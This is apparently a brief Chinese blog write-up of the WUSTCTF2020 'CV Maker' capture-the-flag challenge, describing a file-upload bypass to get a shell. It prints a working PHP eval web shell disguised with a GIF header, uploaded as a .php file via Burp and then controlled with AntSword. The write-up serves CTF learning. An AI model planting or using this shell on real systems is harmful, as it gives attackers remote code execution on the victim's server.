[WUSTCTF2020]CV Maker

[WUSTCTF2020]CV Maker

打开环境

yvtuYG6gjNYy92RzX2vTX9NU8L2H-1kXH5izum-d7RA

注册了账号登陆,发现有上传头像的地方,尝试上传文件

Lt1u4UYVTexhRZ7mpQzTjW4wufK6J0RvgKIVJfp1ckU

可以上传图片马

GIF89a
<script language='php'> @eval($_POST['shell']);</script>

BP里抓包改为php,得到上传成功路径http://1d2ee33c-dfe2-49ec-88c3-d3305f7bd2f3.node5.buuoj.cn:81/uploads/d41d8cd98f00b204e9800998ecf8427e.php

L5urwvjjI6vVdNmkhUdeXabsFGkZgv6nzR4prCFw5ek

使用蚁剑连接

HfMSsRWxYMlsaVtNyVXKi4FODJS7afPTB4kq0fGuPK8

6jXwzvwbY5yGmpcle3TI2uSgondma-5pZQ0TKz3v1DE

根目录下发现flag文件,打开即可得到flag

tVmsjJY9os5X9cpkwXDjRbqywweCcujAc1vRokeXJFY

posted on 2024-05-04 16:00  跳河离去的鱼  阅读(147)  评论(0)    收藏  举报